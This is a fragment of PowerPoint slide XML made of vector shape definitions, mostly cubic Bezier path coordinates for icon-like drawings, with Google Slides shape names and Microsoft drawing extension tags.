                  <a:cubicBezTo>
                    <a:pt x="128907" y="184918"/>
                    <a:pt x="155094" y="166470"/>
                    <a:pt x="166464" y="140129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168915" y="144341"/>
                    <a:pt x="173427" y="147205"/>
                    <a:pt x="178652" y="147205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186466" y="147205"/>
                    <a:pt x="192800" y="140870"/>
                    <a:pt x="192800" y="133056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192800" y="129863"/>
                    <a:pt x="191703" y="126949"/>
                    <a:pt x="189918" y="124581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195902" y="121945"/>
                    <a:pt x="200091" y="115982"/>
                    <a:pt x="200091" y="109024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200091" y="99628"/>
                    <a:pt x="192475" y="92012"/>
                    <a:pt x="183079" y="92012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178441" y="92012"/>
                    <a:pt x="174246" y="93879"/>
                    <a:pt x="171177" y="96890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167730" y="78732"/>
                    <a:pt x="157655" y="62964"/>
                    <a:pt x="143570" y="52105"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143650" y="52044"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131665" y="40434"/>
                    <a:pt x="131096" y="28346"/>
                    <a:pt x="131096" y="28346"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="131073" y="28353"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="129999" y="14204"/>
                    <a:pt x="119024" y="5670"/>
                    <a:pt x="109003" y="808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102605" y="-2296"/>
                    <a:pt x="95719" y="4081"/>
                    <a:pt x="98258" y="10724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98600" y="11618"/>
                    <a:pt x="98846" y="12568"/>
                    <a:pt x="98798" y="13524"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98162" y="26280"/>
                    <a:pt x="75848" y="39113"/>
                    <a:pt x="66419" y="43984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65122" y="44606"/>
                    <a:pt x="63817" y="45209"/>
                    <a:pt x="62563" y="45903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62389" y="45985"/>
                    <a:pt x="62237" y="46055"/>
                    <a:pt x="62237" y="46055"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="62319" y="46052"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44143" y="56203"/>
                    <a:pt x="30709" y="73771"/>
                    <a:pt x="26070" y="94671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23443" y="93009"/>
                    <a:pt x="20351" y="92012"/>
                    <a:pt x="17012" y="92012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7616" y="92012"/>
                    <a:pt x="0" y="99628"/>
                    <a:pt x="0" y="109024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="116074"/>
                    <a:pt x="4289" y="122121"/>
                    <a:pt x="10399" y="124702"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="98393" y="176682"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72165" y="176682"/>
                    <a:pt x="49534" y="161241"/>
                    <a:pt x="38936" y="139006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43941" y="136141"/>
                    <a:pt x="48623" y="133225"/>
                    <a:pt x="52999" y="130272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57459" y="133891"/>
                    <a:pt x="63138" y="136067"/>
                    <a:pt x="69329" y="136067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82700" y="136067"/>
                    <a:pt x="93700" y="125950"/>
                    <a:pt x="95113" y="112955"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="103891" y="112955"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105869" y="125322"/>
                    <a:pt x="116555" y="134781"/>
                    <a:pt x="129479" y="134781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143809" y="134781"/>
                    <a:pt x="155425" y="123165"/>
                    <a:pt x="155425" y="108835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155425" y="94506"/>
                    <a:pt x="143809" y="82889"/>
                    <a:pt x="129479" y="82889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116554" y="82889"/>
                    <a:pt x="105868" y="92351"/>
                    <a:pt x="103891" y="104718"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94703" y="104718"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94037" y="101572"/>
                    <a:pt x="92792" y="98644"/>
                    <a:pt x="91098" y="96033"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105051" y="78812"/>
                    <a:pt x="111152" y="63250"/>
                    <a:pt x="113787" y="53702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122347" y="64184"/>
                    <a:pt x="137420" y="78531"/>
                    <a:pt x="157001" y="80809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161626" y="89814"/>
                    <a:pt x="164288" y="99987"/>
                    <a:pt x="164288" y="110787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164288" y="147121"/>
                    <a:pt x="134727" y="176682"/>
                    <a:pt x="98393" y="176682"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="87038" y="110121"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="87038" y="119886"/>
                    <a:pt x="79094" y="127830"/>
                    <a:pt x="69329" y="127830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65972" y="127830"/>
                    <a:pt x="62864" y="126839"/>
                    <a:pt x="60186" y="125210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55074" y="122101"/>
                    <a:pt x="51620" y="116529"/>
                    <a:pt x="51620" y="110121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51620" y="100356"/>
                    <a:pt x="59564" y="92412"/>
                    <a:pt x="69329" y="92412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76434" y="92412"/>
                    <a:pt x="82534" y="96643"/>
                    <a:pt x="85352" y="102696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86407" y="104962"/>
                    <a:pt x="87038" y="107461"/>
                    <a:pt x="87038" y="110121"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="111770" y="108835"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111770" y="99070"/>
                    <a:pt x="119714" y="91126"/>
                    <a:pt x="129479" y="91126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139244" y="91126"/>
                    <a:pt x="147188" y="99070"/>
                    <a:pt x="147188" y="108835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147188" y="118600"/>
                    <a:pt x="139244" y="126544"/>
                    <a:pt x="129479" y="126544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119714" y="126544"/>
                    <a:pt x="111770" y="118600"/>
                    <a:pt x="111770" y="108835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56;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE525BC3-3134-8661-C782-67100A5400DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7328522" y="1776134"/>
              <a:ext cx="440376" cy="193376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="440376" h="193376" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="436258" y="185140"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358875" y="185140"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="374837" y="177909"/>
                    <a:pt x="385961" y="161876"/>
                    <a:pt x="385961" y="143212"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="385961" y="143212"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="385961" y="135551"/>
                    <a:pt x="384049" y="128010"/>
                    <a:pt x="380399" y="121274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="333376" y="34500"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="321856" y="13242"/>
                    <a:pt x="299619" y="0"/>
                    <a:pt x="275441" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="265665" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="261296" y="0"/>
                    <a:pt x="257106" y="1736"/>
                    <a:pt x="254016" y="4825"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="243175" y="15666"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="233525" y="25316"/>
                    <a:pt x="217880" y="25316"/>
                    <a:pt x="208230" y="15666"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="197389" y="4825"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194299" y="1736"/>
                    <a:pt x="190109" y="0"/>
                    <a:pt x="185740" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174181" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150003" y="0"/>
                    <a:pt x="127766" y="13242"/>
                    <a:pt x="116246" y="34500"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69223" y="121274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="65573" y="128010"/>
                    <a:pt x="63661" y="135551"/>
                    <a:pt x="63661" y="143212"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63661" y="143212"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63661" y="161876"/>
                    <a:pt x="74786" y="177909"/>
                    <a:pt x="90747" y="185140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4118" y="185140"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1844" y="185140"/>
                    <a:pt x="0" y="186982"/>
                    <a:pt x="0" y="189259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="191535"/>
                    <a:pt x="1844" y="193377"/>
                    <a:pt x="4118" y="193377"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="216060" y="193377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222575" y="193377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436258" y="193377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="438533" y="193377"/>
                    <a:pt x="440377" y="191535"/>
                    <a:pt x="440377" y="189259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="440377" y="186982"/>
                    <a:pt x="438533" y="185140"/>
                    <a:pt x="436258" y="185140"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274428" y="130503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="320271" y="117323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="322465" y="116700"/>
                    <a:pt x="324741" y="117958"/>
                    <a:pt x="325367" y="120142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325996" y="122330"/>
                    <a:pt x="324733" y="124611"/>
                    <a:pt x="322547" y="125238"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="276704" y="138418"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="276324" y="138526"/>
                    <a:pt x="275940" y="138579"/>
                    <a:pt x="275564" y="138579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273774" y="138579"/>
                    <a:pt x="272127" y="137404"/>
                    <a:pt x="271608" y="135598"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270979" y="133411"/>
                    <a:pt x="272242" y="131130"/>
                    <a:pt x="274428" y="130503"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="141233" y="128323"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138996" y="127905"/>
                    <a:pt x="137526" y="125749"/>
                    <a:pt x="137947" y="123513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138371" y="121281"/>
                    <a:pt x="140525" y="119817"/>
                    <a:pt x="142757" y="120231"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="219317" y="134662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219317" y="134460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250785" y="140040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249500" y="139620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252337" y="140123"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257597" y="141057"/>
                    <a:pt x="262599" y="142865"/>
                    <a:pt x="267207" y="145409"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="264660" y="144576"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="278505" y="151344"/>
                    <a:pt x="288932" y="164007"/>
                    <a:pt x="292611" y="179480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293094" y="181509"/>
                    <a:pt x="292724" y="183486"/>
                    <a:pt x="291806" y="185140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="223436" y="185140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219317" y="185140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215199" y="185140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215199" y="142267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141233" y="12832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57;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F3266F-10BD-BCDD-2947-CF452BC5CCEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7401813" y="1977257"/>
              <a:ext cx="102328" cy="49420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="102328" h="49420" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="98210" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="28608" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28439" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26987" y="0"/>
                    <a:pt x="25641" y="764"/>
                    <a:pt x="24899" y="2015"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="579" y="43199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-179" y="44470"/>
                    <a:pt x="-193" y="46051"/>
                    <a:pt x="539" y="47338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="48625"/>
                    <a:pt x="2638" y="49421"/>
                    <a:pt x="4118" y="49421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="54012" y="49421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84639" y="49421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84888" y="49421"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86666" y="49421"/>
                    <a:pt x="88244" y="48279"/>
                    <a:pt x="88799" y="46590"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="102122" y="5405"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="102536" y="4151"/>
                    <a:pt x="102321" y="2775"/>
                    <a:pt x="101547" y="1705"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100772" y="635"/>
                    <a:pt x="99532" y="0"/>
                    <a:pt x="98210" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20502" y="25809"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="40487" y="25260"/>
                    <a:pt x="50238" y="13425"/>
                    <a:pt x="53542" y="8237"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92517" y="8237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87685" y="22900"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="62740" y="23862"/>
                    <a:pt x="54002" y="35419"/>
                    <a:pt x="51221" y="41184"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11360" y="41184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20502" y="2580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58;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10CB358-28E7-CE0A-AF0F-4E16F1D9D1D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7621587" y="1977257"/>
              <a:ext cx="91026" cy="28828"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="91026" h="28828" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="86909" y="28829"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88415" y="28829"/>
                    <a:pt x="89798" y="28008"/>
                    <a:pt x="90522" y="26685"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91244" y="25366"/>
                    <a:pt x="91188" y="23757"/>
                    <a:pt x="90377" y="22490"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77190" y="1898"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76432" y="716"/>
                    <a:pt x="75124" y="0"/>
                    <a:pt x="73721" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4118" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="1534" y="644"/>
                    <a:pt x="762" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-11" y="2819"/>
                    <a:pt x="-210" y="4211"/>
                    <a:pt x="229" y="5470"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7390" y="26062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7965" y="27719"/>
                    <a:pt x="9525" y="28829"/>
                    <a:pt x="11279" y="28829"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86909" y="28829"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="38324" y="20592"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72599" y="10002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79380" y="20592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38324" y="20592"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50418" y="8237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13841" y="19538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9911" y="8237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50418" y="823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59;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F757B4C-6455-5B89-1DBF-9FA4F029BEA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7632368" y="2014323"/>
              <a:ext cx="99842" cy="28828"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="99842" h="28828" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="86008" y="1898"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="85250" y="716"/>
                    <a:pt x="83942" y="0"/>
                    <a:pt x="82539" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4118" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="1534" y="644"/>
                    <a:pt x="762" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-11" y="2819"/>
                    <a:pt x="-210" y="4211"/>
                    <a:pt x="229" y="5470"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7388" y="26062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7963" y="27719"/>
                    <a:pt x="9523" y="28829"/>
                    <a:pt x="11277" y="28829"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95725" y="28829"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97231" y="28829"/>
                    <a:pt x="98614" y="28008"/>
                    <a:pt x="99338" y="26685"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100060" y="25366"/>
                    <a:pt x="100004" y="23757"/>
                    <a:pt x="99193" y="22490"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86008" y="1898"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14205" y="20592"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9909" y="8237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80287" y="8237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88198" y="20592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14205" y="2059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60;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08BDEEA-3A74-ACFD-B728-B268DA14AFC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7517567" y="1977257"/>
              <a:ext cx="91632" cy="65894"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="91632" h="65894" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="76762" y="3394"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76410" y="1428"/>
                    <a:pt x="74702" y="0"/>
                    <a:pt x="72707" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72488" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45815" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18633" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16745" y="0"/>
                    <a:pt x="15100" y="1283"/>
                    <a:pt x="14639" y="3113"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="60771"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-185" y="62001"/>
                    <a:pt x="90" y="63309"/>
                    <a:pt x="871" y="64310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="65307"/>
                    <a:pt x="2849" y="65895"/>
                    <a:pt x="4118" y="65895"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="87514" y="65895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88789" y="65895"/>
                    <a:pt x="89994" y="65303"/>
                    <a:pt x="90774" y="64294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91552" y="63284"/>
                    <a:pt x="91822" y="61973"/>
                    <a:pt x="91500" y="60739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76762" y="3394"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="21843" y="8237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41924" y="8237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42493" y="13753"/>
                    <a:pt x="44255" y="18174"/>
                    <a:pt x="47176" y="21467"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10797" y="52112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21843" y="8237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16995" y="57658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54191" y="26325"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57268" y="27540"/>
                    <a:pt x="60543" y="28016"/>
                    <a:pt x="63644" y="28016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67779" y="28016"/>
                    <a:pt x="71546" y="27258"/>
                    <a:pt x="74088" y="26590"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82185" y="57658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16995" y="5765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0482CB-B3BB-9BD1-AA8E-574D2523FB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1971548" y="2956607"/>
            <a:ext cx="1453613" cy="666845"/>
            <a:chOff x="1971548" y="2956607"/>
            <a:chExt cx="1453613" cy="666845"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Google Shape;574;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3F9874-91A4-BFAB-58A1-6D53BC7120EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1971548" y="2956607"/>
              <a:ext cx="1453613" cy="666845"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16717" h="15403" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9149" y="511"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9587" y="560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10025" y="608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10439" y="681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10877" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11290" y="900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11704" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12093" y="1217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12483" y="1411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12994" y="1703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13505" y="2020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13967" y="2360"/>
